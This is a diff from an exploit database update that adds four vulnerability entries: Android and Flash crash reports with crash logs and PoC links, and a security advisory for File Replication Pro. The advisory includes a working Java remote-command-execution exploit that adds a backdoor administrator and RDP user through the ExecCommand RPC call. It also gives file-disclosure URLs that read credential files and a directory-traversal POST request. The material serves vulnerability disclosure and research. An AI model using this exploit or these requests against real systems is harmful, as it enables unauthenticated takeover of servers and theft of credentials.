DB: 2016-02-12

4 new exploits

files.csv

@@ -35662,6 +35662,9 @@ id,file,description,date,author,platform,type,port
 39421,platforms/php/webapps/39421.py,"WordPress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80
 39422,platforms/php/webapps/39422.py,"WordPress WP User Frontend Plugin < 2.3.11 - Unrestricted File Upload",2016-02-08,"Panagiotis Vagenas",php,webapps,80
 39423,platforms/php/webapps/39423.txt,"WordPress Booking Calendar Contact Form Plugin <= 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",php,webapps,80
+39424,platforms/android/dos/39424.txt,"Samsung Galaxy S6 - libQjpeg je_free Crash",2016-02-08,"Google Security Research",android,dos,0
+39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)",2016-02-08,"Google Security Research",android,dos,0
+39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0
 39427,platforms/php/webapps/39427.txt,"Employee Timeclock Software 0.99 - SQL Injection Vulnerabilities",2010-03-10,"Secunia Research",php,webapps,0
 39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - .mp3 Crash PoC",2016-02-09,"Shantanu Khandelwal",windows,dos,0
 39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
@@ -35673,3 +35676,4 @@ id,file,description,date,author,platform,type,port
 39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80
 39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L Authenticated Remote Command Execution",2016-02-10,metasploit,hardware,remote,0
 39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0
+39439,platforms/jsp/remote/39439.txt,"File Replication Pro <= 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0

platforms/android/dos/39424.txt

@@ -0,0 +1,41 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=617
+
+The attached jpg causes an invalid pointer to be freed when media scanning occurs.
+
+F/libc    (11192): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xffffffffffffb0 in tid 14368 (HEAVY#7)
+I/DEBUG   ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
+I/DEBUG   ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
+I/DEBUG   ( 3021): Revision: '10'
+I/DEBUG   ( 3021): ABI: 'arm64'
+I/DEBUG   ( 3021): pid: 11192, tid: 14368, name: HEAVY#7  >>> com.samsung.dcm:DCMService <<<
+I/DEBUG   ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xffffffffffffb0
+I/DEBUG   ( 3021):     x0   0000000000000002  x1   0000007f89fa9758  x2   00000000003fffff  x3   0000000000000000
+I/DEBUG   ( 3021):     x4   0000000000000000  x5   0000007f89f98000  x6   0000007f89fa9790  x7   0000000000000006
+I/DEBUG   ( 3021):     x8   fffffffffffffffa  x9   ffffffffffffffee  x10  ffffffffffffff70  x11  0000007f7f000bb8
+I/DEBUG   ( 3021):     x12  0000000000000014  x13  0000007f89f98000  x14  0000007f89fa5000  x15  0000004000000000
+I/DEBUG   ( 3021):     x16  0000007f7eed6ba0  x17  0000007f89ef38fc  x18  0000007f89fa9830  x19  0000000000000002
+I/DEBUG   ( 3021):     x20  000000000000001f  x21  0000007f89f98000  x22  00000000ffffffff  x23  0000007f7f0647f8
+I/DEBUG   ( 3021):     x24  0000007f71809b10  x25  0000000000000010  x26  0000000000000080  x27  fffffffffffffffc
+I/DEBUG   ( 3021):     x28  0000007f7edf9dd0  x29  0000007f7edf9b50  x30  0000007f89ef3914
+I/DEBUG   ( 3021):     sp   0000007f7edf9b50  pc   0000007f89f53b24  pstate 0000000020000000
+I/DEBUG   ( 3021): 
+I/DEBUG   ( 3021): backtrace:
+I/DEBUG   ( 3021):     #00 pc 0000000000079b24  /system/lib64/libc.so (je_free+92)
+I/DEBUG   ( 3021):     #01 pc 0000000000019910  /system/lib64/libc.so (free+20)
+I/DEBUG   ( 3021):     #02 pc 000000000003f8cc  /system/lib64/libQjpeg.so (WINKJ_DeleteDecoderInfo+916)
+I/DEBUG   ( 3021):     #03 pc 0000000000043890  /system/lib64/libQjpeg.so (WINKJ_DecodeImage+2852)
+I/DEBUG   ( 3021):     #04 pc 00000000000439b4  /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
+I/DEBUG   ( 3021):     #05 pc 0000000000043af0  /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+284)
+I/DEBUG   ( 3021):     #06 pc 0000000000045ddc  /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+440)
+I/DEBUG   ( 3021):     #07 pc 00000000000a24c0  /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
+I/DEBUG   ( 3021):     #08 pc 0000000000001b98  /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
+I/DEBUG   ( 3021):     #09 pc 0000000000001418  /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
+
+To reproduce, download the image file and wait, or trigger media scanning by calling:
+
+adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39424.zip
+

platforms/android/dos/39425.txt

@@ -0,0 +1,32 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=616
+
+The attached file causes memory corruption when iy is scanned by the face recognition library in android.media.process
+
+F/libc    ( 4134): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x33333333333358 in tid 12161 (syncThread)
+I/DEBUG   ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
+I/DEBUG   ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
+I/DEBUG   ( 3021): Revision: '10'
+I/DEBUG   ( 3021): ABI: 'arm64'
+I/DEBUG   ( 3021): pid: 4134, tid: 12161, name: syncThread  >>> android.process.media <<<
+I/DEBUG   ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x33333333333358
+I/DEBUG   ( 3021):     x0   3333333333333330  x1   0000007f714b6800  x2   000000000000001f  x3   3333333333333330
+I/DEBUG   ( 3021):     x4   0000007f817fedb8  x5   0000007f7c1f4ea8  x6   0000007f7c1f4ec0  x7   0000007f7c109680
+I/DEBUG   ( 3021):     x8   304b333333333333  x9   3033330333000000  x10  3333333333333333  x11  0103304b33333333
+I/DEBUG   ( 3021):     x12  0000040033300311  x13  0300035033333333  x14  0300303333233333  x15  0000000000001484
+I/DEBUG   ( 3021):     x16  0000007f74bfe828  x17  0000007f8c086008  x18  0000007f8c13b830  x19  0000007f7c279a00
+I/DEBUG   ( 3021):     x20  0000000000000000  x21  0000007f7c1036a0  x22  0000007f817ff440  x23  0000007f7c279a10
+I/DEBUG   ( 3021):     x24  0000000032d231a0  x25  0000000000000065  x26  0000000032d28880  x27  0000000000000065
+I/DEBUG   ( 3021):     x28  0000000000000000  x29  0000007f817fecb0  x30  0000007f740be014
+I/DEBUG   ( 3021):     sp   0000007f817fecb0  pc   0000007f740cefdc  pstate 0000000080000000
+I/DEBUG   ( 3021): 
+I/DEBUG   ( 3021): backtrace:
+I/DEBUG   ( 3021):     #00 pc 0000000000065fdc  /system/lib64/libfacerecognition.so (MdConvertLine+28)
+I/DEBUG   ( 3021):     #01 pc 0000000000055010  /system/lib64/libfacerecognition.so (MCC_Process+160)
+
+To reproduce, download the attached file and wait, or trigger media scanning by calling:
+
+adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39425.zip

platforms/jsp/remote/39439.txt

@@ -0,0 +1,213 @@
+Vantage Point Security Advisory 2016-001
+================================
+
+Title: File Replication Pro Remote Command Execution
+Vendor: File Replication Pro
+Vendor URL: http://www.filereplicationpro.com/
+Versions affected: =< 7.2.0
+Severity: High
+Vendor notified: Yes
+Reported: 29 October 2015
+Public release: 10 February 2016
+Author: Jerold Hoong and the VP team <jerold[at]vantagepoint[dot]sg>
+Permalink:
+
+Summary:
+--------
+File Replication Pro (FRP)  is a file management solution that is used
+to back up and copy files from various nodes in the network. Vantage
+Point has discovered multiple vulnerabilities in FRP v7.2.0 (and
+possibly prior versions) that allow a remote unauthenticated malicious
+run arbitrary code with SYSTEM privileges.
+
+The vulnerabilities that were discovered are:
+
+- Unauthenticated Remote Command Execution
+- Unauthenticated Remote Arbitrary File Disclosure
+- Unauthenticated Directory Traversal and File Listing
+
+1. Unauthenticated Remote Command Execution
+-------------------------------------------
+The backup agents implements a RPC service port 9200 that supports
+various calls, including a function called "ExecCommand" that
+unsurprisingly executes shell commands on the system. A password hash
+is used to authenticate calls on this interface (note that the hash
+itself and not the password is used for authentication). This hash can
+be obtained from the remote file disclosure vulnerability present in
+the software (listed below) and used to  authenticate to the RPC
+service, where subsequently, arbitrary commands are executed as the
+SYSTEM user.
+
+POC Exploit Code of Malicious RPC Client:
+
+/**
+ * @author Jerold Hoong (Vantage Point Security)
+ * File Replication Pro =< v7.2.0
+ * Remote Command Execution PoC Working Exploit
+ * www.vantagepoint.sg
+ * NOTE: Include FRP libraries to compile
+ */
+
+import java.io.IOException;
+import java.util.HashMap;
+import java.util.Map;
+import net.diasoft.frp.engine.exception.RPCException;
+import net.diasoft.frp.engine.model.AddressPort;
+import net.diasoft.frp.engine.tcp.client.RPCDriver;
+import net.diasoft.frp.engine.tcp.client.TCPConnection;
+
+public class Main {
+
+    static String ip = "1.2.3.4";
+    static int port = 9200;
+    // password string can be retrieved from remote file disclosure
+vulnerability (configuration.xml)
+    // If no password is set, input blank string for password
+    // Use IE to navigate to <Target IP>:9200. OK = NO-AUTH, Error = AUTH
+
+    static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=
+
+    public static void main(String[] args) {
+
+        AddressPort ap = new AddressPort(ip, port);
+        AddressPort addresses[] = {ap};
+        TCPConnection _tcp_connection = null;
+
+        try {
+            _tcp_connection = new TCPConnection(addresses, password, true);
+
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+
+        System.out.print("Connecting to host...");
+        RPCDriver rpc = new RPCDriver(_tcp_connection);
+        HashMap p = new HashMap();
+
+        try {
+            Map r = rpc.callFunction("ExecCommand", p);
+            System.out.print("Success!\n");
+        } catch (RPCException e) {
+            e.printStackTrace();
+        } catch (IOException e) {
+            e.printStackTrace();
+        } catch (ClassNotFoundException e) {
+
+            e.printStackTrace();
+        }
+
+        // add new user
+        System.out.print("Attempting to add user 'vantagepoint' with
+password 'LOLrofl1337!': ");
+        p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add");
+        try {
+            Map r = rpc.callFunction("ExecCommand", p);
+        } catch (RPCException e) {
+            e.printStackTrace();
+        } catch (IOException e) {
+            e.printStackTrace();
+        } catch (ClassNotFoundException e) {
+
+            e.printStackTrace();
+        }
+
+        // add new user to Admin group
+        System.out.print("Attempting to add user 'vantagepoint' to
+'Administrators' group: ");
+        p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add");
+        try {
+            Map r = rpc.callFunction("ExecCommand", p);
+        } catch (RPCException e) {
+            e.printStackTrace();
+        } catch (IOException e) {
+            e.printStackTrace();
+        } catch (ClassNotFoundException e) {
+
+            e.printStackTrace();
+        }
+
+        //add new user to RDP group
+        System.out.print("Attempting to add user 'vantagepoint' to
+'Remote Desktop Users' group:");
+        p.put("COMMAND", "net localgroup \"Remote Desktop Users\"
+vantagepoint /add");
+        try {
+            Map r = rpc.callFunction("ExecCommand", p);
+        } catch (RPCException e) {
+            e.printStackTrace();
+        } catch (IOException e) {
+            e.printStackTrace();
+        } catch (ClassNotFoundException e) {
+
+            e.printStackTrace();
+        }
+        System.out.print("\n\n---- END ----\n\n");
+
+    }
+}
+
+
+2. Unauthenticated Remote Arbitrary File Disclosure
+---------------------------------------------------
+A flaw in File Replication Pro allows a malicious user to gain access
+to the contents of any file on the remote server. This leads to the
+compromise of sensitive information such as user accounts and password
+hashes, which can then be used to further exploit the server using
+other vulnerabilities in the software. An example of how to view File
+Replication Pro's web interface user accounts and credentials is shown
+below by accessing the following URLs:
+
+- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\properties.xml
+- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml
+
+
+3. Unauthenticated Directory Traversal and File Listing
+-------------------------------------------------------
+It was possible to anonymously view the file directory structure of
+the remote File Replication Pro management server as well as the file
+directory structure of all server nodes that are managed by the
+management server. The parameters that are used to construct the POST
+request in the example code below can be obtained via the remote file
+disclosure vulnerability by accessing File Replication Pro's
+configuration.xml, properties.xml and .frp_id files.
+
+POST /GetRemoteDirList.jsp?server_name=WIN7SP1&server_key=WIN7SP1~29d919a3:150c736b708:-8000&server_role=Source&server_password=&parent_dir=../../../c:/
+HTTP/1.1
+Host: 127.0.0.1:9100
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1:9100/AddEditJob.do?action=new
+Cookie: show_greeting=value; JSESSIONID=81cgjqf795cai
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Length: 0
+
+
+Fix Information:
+----------------
+Upgrade to the latest version of File Replication Pro 7.3.0
+
+Timeline:
+---------
+28 October 2015  - Vulnerabilities discovered
+06 November 2015 - Vendor acknowledged and scheduled fixes to commence
+02 February 2016 - Patch released by vendor
+10 February 2016 - Release of this advisory to the public
+
+About Vantage Point Security:
+-----------------------------
+
+Vantage Point is the leading provider for penetration testing and
+security advisory services in Singapore. Clients in the Financial,
+Banking and Telecommunications industries select Vantage Point
+Security based on technical competency and a proven track record to
+deliver significant and measurable improvements in their security
+posture.
+
+https://www.vantagepoint.sg/
+office[at]vantagepoint[dot]sg
+
+

platforms/multiple/dos/39426.txt

@@ -0,0 +1,7 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=634
+
+The attached mp4 file causes stack corruption in Flash. To run the test, load LoadMP42.swf?file=null.mp4 from a remote server.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39426-1.zip